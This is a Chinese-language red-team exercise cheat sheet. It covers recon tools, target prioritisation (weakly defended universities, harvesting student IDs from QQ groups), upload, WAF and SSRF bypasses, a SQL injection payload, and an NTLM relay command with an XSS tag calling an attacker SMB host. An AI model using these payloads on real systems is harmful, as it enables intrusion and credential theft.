hw小技巧
字数 1967 2025-08-20 18:17:53

HW渗透测试实战技巧与经验总结

一、信息收集方法论

1.1 资源扩展技巧

  • 单位名称利用:在FOFA等平台搜索 title="单位名称"
  • 域名扩展:推荐工具:
    • 挖掘机
    • subDomainsBrute.py
  • IP处理
    • 外网扫描:masscan
    • 内网扫描:nbtscan

1.2 目标分析工具

  • Wappalyzer:识别网站框架技术栈
  • Shodan:端口探测与漏洞发现
  • 敏感文件探测
    • phpinfo.php
    • robots.txt
    • 在线检测平台:https://scan.top15.cn/web/infoleak

1.3 高级收集技巧

  • 测试域传输漏洞
  • 后台手动探测路径:/admin, /login, /manager,或根据公司名称推测
  • 特殊文件利用:
    • .git文件:可恢复源代码
    • .DS_Store:可用Python EXP利用
    • .svn文件
    • .swp文件:使用vim -r恢复

二、目标选择策略

2.1 目标优先级排序

  1. 高校系统

    • 资源丰富(OA、教务、广播、新闻系统)
    • 防御相对薄弱
    • 社工容易(通过QQ群获取学号等信息)

  2. 中等优先级

    • 化工/交通/能源行业
    • 论坛系统
    • 各类企业系统

  3. 低优先级

    • 医院系统(HIS系统风险高)
    • 银行系统
    • 电信运营商系统

三、攻击路径与得分技巧

3.1 高效得分方法

  1. 框架漏洞利用

    • ThinkPHP、Joomla等已知EXP
    • Java框架特别关注:
      • Struts2
      • JBoss反序列化
      • Shiro反序列化

  2. 弱口令攻击

    • 常用组合:admin/admin, admin/123456等
    • 特殊技巧:注册账号时使用admin[多个空格]可能绕过验证

  3. 文件上传绕过

    • 黑名单绕过:
      • 修改后缀为csproj后包含
      • 使用phtml等假后缀
    • 白名单绕过:
      • 利用环境变量(如将dll改为php后转换)
      • 修改Content-Type为application/vnd.php.serialized

  4. 未授权访问

    • Redis
    • MongoDB
    • 各类内网系统

  5. SQL注入高级技巧

    • 使用?x=1-if(user() like 'x%25',0,1)等Payload
    • GET改POST注入
    • 添加X-Forward: 127.0.0.1可能绕过过滤
    • 构造白名单词汇绕过WAF
    • 垃圾数据注入(POST型放参数后,GET型转POST)

3.2 其他漏洞利用

  • XSS钓鱼:需要时间但有效
  • XXE/SSRF/CSRF:遇到即利用
  • SWF文件:可构造XSS Payload
  • NTLM中继:利用XSS获取NTLM 
    python ntlmrelayx.py -tf targets.txt -c hostname > ~/smbrelay.txt
<script src="\\\\10.0.0.7\\smbrelay">

四、HW实战技巧

4.1 报告提交策略

  1. 资源共享时

    • 发现漏洞先提交空报告占位
    • 后续补充完整内容
    • 防止他人抢先提交相同漏洞

  2. 资源未共享时

    • 提交完整渗透链报告
    • 从外网打点到内网横向移动

4.2 特殊绕过技巧

  1. 路径绕过

    • /urltest/./info/secret.jsp
    • /urltest/;xinxin/info/secret.jsp
    • /urltest/xinxin/../info/secret.jsp

  2. SSRF绕过

    • IP转八进制(可加0-3个前导0)
    • 去掉https:////
    • 重定向技巧: 
      <a href="https://www.baidu.com@127.0.0.1">
      (@可替换为#或?)

  3. Cookie/Session操作

    • 修改参数可能实现任意用户浏览
    • 同源策略下设置document.cookie共享

  4. 命令执行探测

    • 测试command=cat+/etc/version
    • 观察URL中action=等参数,尝试路径遍历

五、工具推荐清单

  1. 信息收集

    • FOFA/Shodan
    • 挖掘机/subDomainsBrute.py
    • masscan/nbtscan

  2. 目录扫描

    • dirsearch.py
    • 御剑

  3. 后台发现

    • test404轻量级后台扫描器

  4. 被动扫描

    • xray(曾发现3个注入)

  5. 浏览器插件

    • Wappalyzer
    • Shodan

六、防御规避经验

  1. WAF绕过

    • 改变请求方式(GET转POST)
    • 添加垃圾数据
    • 使用白名单词汇
    • 修改HTTP头(如X-Forward)

  2. 权限提升

    • 后台修改密码时替换refer和管理员账号
    • 利用逻辑漏洞提升权限

  3. 静态防御绕过

    • 对于静态登录页面,利用同源策略设置cookie
    • 尝试添加端口号(如:80)绕过访问限制

七、实战注意事项

  1. 目标确认

    • 避免"打偏"(攻击错误目标)
    • 多次验证目标归属

  2. 时间管理

    • 优先处理易得分的漏洞
    • 合理分配时间给不同目标

  3. 团队协作

    • 及时共享有效Payload
    • 分工明确(信息收集、漏洞验证、报告撰写)

本总结基于2020年HW实战经验,部分技术可能需要根据当前环境调整。请务必在合法授权范围内使用这些技术。

HW渗透测试实战技巧与经验总结 一、信息收集方法论 1.1 资源扩展技巧 单位名称利用 :在FOFA等平台搜索 title="单位名称" 域名扩展 :推荐工具: 挖掘机 subDomainsBrute.py IP处理 : 外网扫描:masscan 内网扫描:nbtscan 1.2 目标分析工具 Wappalyzer :识别网站框架技术栈 Shodan :端口探测与漏洞发现 敏感文件探测 : phpinfo.php robots.txt 在线检测平台:https://scan.top15.cn/web/infoleak 1.3 高级收集技巧 测试域传输漏洞 后台手动探测路径: /admin , /login , /manager ,或根据公司名称推测 特殊文件利用: .git文件:可恢复源代码 .DS_ Store:可用Python EXP利用 .svn文件 .swp文件:使用 vim -r 恢复 二、目标选择策略 2.1 目标优先级排序 高校系统 : 资源丰富(OA、教务、广播、新闻系统) 防御相对薄弱 社工容易(通过QQ群获取学号等信息) 中等优先级 : 化工/交通/能源行业 论坛系统 各类企业系统 低优先级 : 医院系统(HIS系统风险高) 银行系统 电信运营商系统 三、攻击路径与得分技巧 3.1 高效得分方法 框架漏洞利用 : ThinkPHP、Joomla等已知EXP Java框架特别关注: Struts2 JBoss反序列化 Shiro反序列化 弱口令攻击 : 常用组合:admin/admin, admin/123456等 特殊技巧:注册账号时使用 admin[多个空格] 可能绕过验证 文件上传绕过 : 黑名单绕过: 修改后缀为csproj后包含 使用phtml等假后缀 白名单绕过: 利用环境变量(如将dll改为php后转换) 修改Content-Type为 application/vnd.php.serialized 未授权访问 : Redis MongoDB 各类内网系统 SQL注入高级技巧 : 使用 ?x=1-if(user() like 'x%25',0,1) 等Payload GET改POST注入 添加X-Forward: 127.0.0.1可能绕过过滤 构造白名单词汇绕过WAF 垃圾数据注入(POST型放参数后,GET型转POST) 3.2 其他漏洞利用 XSS钓鱼 :需要时间但有效 XXE/SSRF/CSRF :遇到即利用 SWF文件 :可构造XSS Payload NTLM中继 :利用XSS获取NTLM 四、HW实战技巧 4.1 报告提交策略 资源共享时 : 发现漏洞先提交空报告占位 后续补充完整内容 防止他人抢先提交相同漏洞 资源未共享时 : 提交完整渗透链报告 从外网打点到内网横向移动 4.2 特殊绕过技巧 路径绕过 : /urltest/./info/secret.jsp /urltest/;xinxin/info/secret.jsp /urltest/xinxin/../info/secret.jsp SSRF绕过 : IP转八进制(可加0-3个前导0) 去掉 https:// 的 // 重定向技巧: (@可替换为#或?) Cookie/Session操作 : 修改参数可能实现任意用户浏览 同源策略下设置 document.cookie 共享 命令执行探测 : 测试 command=cat+/etc/version 观察URL中 action= 等参数,尝试路径遍历 五、工具推荐清单 信息收集 : FOFA/Shodan 挖掘机/subDomainsBrute.py masscan/nbtscan 目录扫描 : dirsearch.py 御剑 后台发现 : test404轻量级后台扫描器 被动扫描 : xray(曾发现3个注入) 浏览器插件 : Wappalyzer Shodan 六、防御规避经验 WAF绕过 : 改变请求方式(GET转POST) 添加垃圾数据 使用白名单词汇 修改HTTP头(如X-Forward) 权限提升 : 后台修改密码时替换refer和管理员账号 利用逻辑漏洞提升权限 静态防御绕过 : 对于静态登录页面,利用同源策略设置cookie 尝试添加端口号(如:80)绕过访问限制 七、实战注意事项 目标确认 : 避免"打偏"(攻击错误目标) 多次验证目标归属 时间管理 : 优先处理易得分的漏洞 合理分配时间给不同目标 团队协作 : 及时共享有效Payload 分工明确(信息收集、漏洞验证、报告撰写) 本总结基于2020年HW实战经验,部分技术可能需要根据当前环境调整。请务必在合法授权范围内使用这些技术。